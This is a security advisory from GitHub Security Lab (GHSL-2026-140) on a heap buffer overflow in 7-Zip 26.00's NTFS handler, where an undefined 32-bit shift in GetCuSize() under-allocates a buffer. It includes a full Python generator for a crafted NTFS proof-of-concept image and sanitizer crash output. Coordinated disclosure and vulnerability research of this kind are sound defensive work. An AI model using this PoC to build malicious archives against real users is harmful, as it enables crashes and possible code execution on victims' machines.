Coordinated Disclosure Timeline

Summary

A heap buffer overflow vulnerability (GHSL-2026-140) exists in 7-Zip version 26.00, caused by an under-allocation in the NTFS compressed stream buffer (GetCuSize shift UB), potentially allowing attackers to exploit this issue for arbitrary code execution or application crashes.

Project

7-Zip

Tested Version

v26.00

Details

Heap buffer overflow via NTFS compressed stream buffer under-allocation (GetCuSize shift UB) (GHSL-2026-140)

A heap buffer overflow vulnerability exists in the NTFS archive handler in 7-Zip that can lead to code execution via vtable hijack. The CInStream::GetCuSize() function computes the NTFS compression-unit buffer size using a 32-bit shift (UInt32)1 << (BlockSizeLog + CompressionUnit). When an attacker-crafted NTFS image sets ClusterSizeLog >= 28 (accepted by the parser) and a compressed data attribute with CompressionUnit == 4, the shift exponent reaches 32 — undefined behavior in C++. On both x86 and x64, the UB causes _inBuf to be allocated as 1 byte. The subsequent ReadStream_FALSE writes 256 MB of attacker-controlled data into this 1-byte buffer.

The NTFS boot sector parser accepts cluster sizes up to 2^30 bytes (CPP/7zip/Archive/NtfsHandler.cpp, line 133):

// NtfsHandler.cpp, lines 122-134
const unsigned v = p[13];
if (v <= 0x80)
{
  const int t = GetLog(v);
  if (t < 0) return false;
  sectorsPerClusterLog = (unsigned)t;
}
else
  sectorsPerClusterLog = 0x100 - v;
ClusterSizeLog = SectorSizeLog + sectorsPerClusterLog;
if (ClusterSizeLog > 30)        // allows 28, 29, 30
  return false;

Non-resident compressed data attributes carry CompressionUnit from the attacker-controlled attribute header (NtfsHandler.cpp:509). The value CompressionUnit == 4 is explicitly accepted (NtfsHandler.cpp:430).

The compressed stream’s buffer size is computed as:

// NtfsHandler.cpp, line 687
UInt32 GetCuSize() const { return (UInt32)1 << (BlockSizeLog + CompressionUnit); }

When BlockSizeLog == 28 and CompressionUnit == 4, the exponent is 32undefined behavior (shift by >= type width). On x86, (UInt32)1 << 32 typically yields 1 due to hardware masking of shift counts.

The undersized buffer is then used:

// NtfsHandler.cpp, lines 695-697
UInt32 cuSize = GetCuSize();     // UB → 1 byte on x86/x64
_inBuf.Alloc(cuSize);           // allocates 1 byte
_outBuf.Alloc(kNumCacheChunks << _chunkSizeLog);  // x86: 2 bytes; x64: 8 GB (succeeds on >= 16 GB RAM)

NTFS uses LZNT1 compression. The two buffers serve a standard decompress pipeline:

The normal flow is: disk → _inBufLznt1Dec()_outBufmemcpy to caller. Both buffers should be GetCuSize() bytes (one compression unit). Due to the shift UB, _inBuf gets 1 byte instead of the intended size, so the very first step — reading compressed data from disk into _inBuf — overflows:

// NtfsHandler.cpp, lines 940-941
const size_t compressed = (size_t)numChunks << BlockSizeLog;  // up to 256 MB
RINOK(ReadStream_FALSE(Stream, _inBuf + offs, compressed))    // writes into 1-byte buffer

Note that the overflow target is _inBuf, not _outBuf. On x64, even when the 8 GB _outBuf allocation succeeds, the 1-byte _inBuf is still overflowed because both buffer sizes are computed independently from the same UB shift result.

Platform-dependent behavior

On 32-bit builds, (size_t)2 << 32 is also UB (size_t is 32-bit), yielding 2 via hardware masking. Both _inBuf.Alloc(1) and _outBuf.Alloc(2) succeed with tiny allocations, and the heap overflow is unconditionally reached.

On 64-bit builds, (size_t)2 << 32 is a valid 64-bit shift yielding 8,589,934,592 (8 GB). The _outBuf.Alloc(8 GB) call succeeds on systems with sufficient RAM (confirmed on a 64 GB machine). After the allocation succeeds, execution proceeds to ReadStream_FALSE and the same heap overflow occurs. On low-memory systems, the allocation may fail with CNewException, limiting the impact to DoS.

Impact

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H — 8.8 (High)

Affected versions: The GetCuSize() computation has been present since NTFS compressed stream support was introduced. All versions through 26.00 are affected.

CWEs

Resources

PoC generator (gen_ntfs_sparse.py) — generates poc_ntfs_sparse.ntfs (512 MB sparse NTFS image, ~8 KB actual data):

#!/usr/bin/env python3
"""Generate a sparse NTFS image with ClusterSizeLog=28 and a compressed
$DATA attribute with CompressionUnit=4 to trigger GetCuSize() UB."""
import struct, os, sys

boot = bytearray(512)
boot[0:3] = b'\xEB\x52\x90'
boot[3:11] = b'NTFS    '
struct.pack_into('<H', boot, 11, 512)
boot[13] = 0xED  # ClusterSizeLog = 28
for i in range(14, 21): boot[i] = 0
boot[21] = 0xF8
struct.pack_into('<H', boot, 24, 63)
struct.pack_into('<H', boot, 26, 255)
struct.pack_into('<Q', boot, 40, 2 << 19)  # TotalSectors
struct.pack_into('<Q', boot, 48, 1)  # MftCluster=1 -> offset 256MB
boot[64] = 0xF6
boot[68] = 0xF6
struct.pack_into('<Q', boot, 72, 0x1234567890ABCDEF)
boot[510] = 0x55; boot[511] = 0xAA

MFT_REC = 1024

def mft_rec(seq, flags, attrs, rec_num=0):
    r = bytearray(MFT_REC)
    r[0:4] = b'FILE'
    struct.pack_into('<H', r, 4, 0x30)   # UpdateSequenceOffset
    struct.pack_into('<H', r, 6, 3)      # UpdateSequenceSize
    struct.pack_into('<Q', r, 8, 0)
    struct.pack_into('<H', r, 16, seq)
    struct.pack_into('<H', r, 18, 1)
    struct.pack_into('<H', r, 20, 0x38)
    struct.pack_into('<H', r, 22, flags)
    bytes_in_use = (0x38 + len(attrs) + 8 + 7) & ~7
    struct.pack_into('<I', r, 24, bytes_in_use)
    struct.pack_into('<I', r, 28, MFT_REC)
    struct.pack_into('<I', r, 0x2C, rec_num)
    r[0x38:0x38+len(attrs)] = attrs
    struct.pack_into('<I', r, 0x38+len(attrs), 0xFFFFFFFF)
    usn = 0x0001
    struct.pack_into('<H', r, 0x30, usn)
    orig0 = struct.unpack_from('<H', r, 510)[0]
    orig1 = struct.unpack_from('<H', r, 1022)[0]
    struct.pack_into('<H', r, 0x32, orig0)
    struct.pack_into('<H', r, 0x34, orig1)
    struct.pack_into('<H', r, 510, usn)
    struct.pack_into('<H', r, 1022, usn)
    return r

def std_info():
    d = bytearray(48)
    a = bytearray(24 + len(d))
    struct.pack_into('<I', a, 0, 0x10)
    struct.pack_into('<I', a, 4, len(a))
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(d))
    a[24:24+len(d)] = d
    return a

def filename(name):
    nu = name.encode('utf-16-le')
    fn = bytearray(66 + len(nu))
    struct.pack_into('<Q', fn, 0, 5)
    fn[64] = len(name)
    fn[65] = 3
    fn[66:66+len(nu)] = nu
    raw_len = 24 + len(fn)
    padded_len = (raw_len + 7) & ~7
    a = bytearray(padded_len)
    struct.pack_into('<I', a, 0, 0x30)
    struct.pack_into('<I', a, 4, padded_len)
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(fn))
    a[24:24+len(fn)] = fn
    return a

def compressed_data():
    rl = bytes([0x11, 0x01, 0x01, 0x00])  # 1 cluster at LCN 1
    hdr_size = 0x48
    sz = (hdr_size + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 0x10, 0)     # LowVcn
    struct.pack_into('<Q', a, 0x18, 0)     # HighVcn
    struct.pack_into('<H', a, 0x20, hdr_size)  # RunlistOffset
    a[0x22] = 4                            # CompressionUnit = 4
    cs = 1 << 28
    struct.pack_into('<Q', a, 0x28, cs)    # AllocatedSize
    struct.pack_into('<Q', a, 0x30, 100)   # Size
    struct.pack_into('<Q', a, 0x38, 100)   # InitializedSize
    struct.pack_into('<Q', a, 0x40, cs)    # PackSize
    a[hdr_size:hdr_size+len(rl)] = rl
    return a

def mft_data_attr(num_records):
    rl = bytes([0x11, 0x01, 0x01, 0x00])
    sz = (72 + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 16, 0)
    struct.pack_into('<Q', a, 24, 0)
    struct.pack_into('<H', a, 32, 0x40)
    struct.pack_into('<H', a, 34, 0)       # CompressionUnit = 0
    data_size = num_records * MFT_REC
    struct.pack_into('<Q', a, 40, 1 << 28)
    struct.pack_into('<Q', a, 48, data_size)
    struct.pack_into('<Q', a, 56, data_size)
    a[0x40:0x40+len(rl)] = rl
    return a

num_mft_records = 7
mft  = mft_rec(1, 1, std_info() + mft_data_attr(num_mft_records), rec_num=0)
for i in range(1, 5):
    mft += mft_rec(i+1, 1, std_info(), rec_num=i)
mft += mft_rec(1, 3, std_info(), rec_num=5)  # root dir
mft += mft_rec(1, 1, std_info() + filename("test.txt") + compressed_data(), rec_num=6)

mft_off = 1 << 28   # 256 MB
phy_size = 2 << 28   # 512 MB
out = sys.argv[1] if len(sys.argv) > 1 else "poc_ntfs_sparse.ntfs"
with open(out, 'wb') as f:
    f.write(boot)
    f.seek(mft_off)
    f.write(mft)
    f.seek(phy_size - 1)
    f.write(b'\x00')

print(f"Generated: {out} ({os.stat(out).st_size} bytes apparent)")

Usage: python3 gen_ntfs_sparse.py [output_path]

The PoC constructs a hand-crafted NTFS image with ClusterSizeLog = 28 (256 MB clusters), 7 MFT records at offset 256 MB, and a compressed $DATA attribute with CompressionUnit = 4. No existing NTFS formatting tool (mkntfs) supports clusters larger than 64 KB, so the entire MFT structure is synthesized from scratch with correct:

Verification

Confirmed with UBSan.

UBSan (clang, Linux x64, recovery mode)

Confirms the root-cause shift UB regardless of platform:

../../Archive/NtfsHandler.cpp:687:47: runtime error: shift exponent 32 is too large
    for 32-bit type 'UInt32' (aka 'unsigned int')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior
    ../../Archive/NtfsHandler.cpp:687:47

After the UB, cascading corruption leads to a SEGV:

../../Common/StreamUtils.cpp:62:27: runtime error: member call on address 0x5d3dd8f776f0
    which does not point to an object of type 'ISequentialInStream'
    note: object has invalid vptr
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==60==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000018
==60==Hint: address points to the zero page.

CVE

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2026-140 in any communication regarding this issue.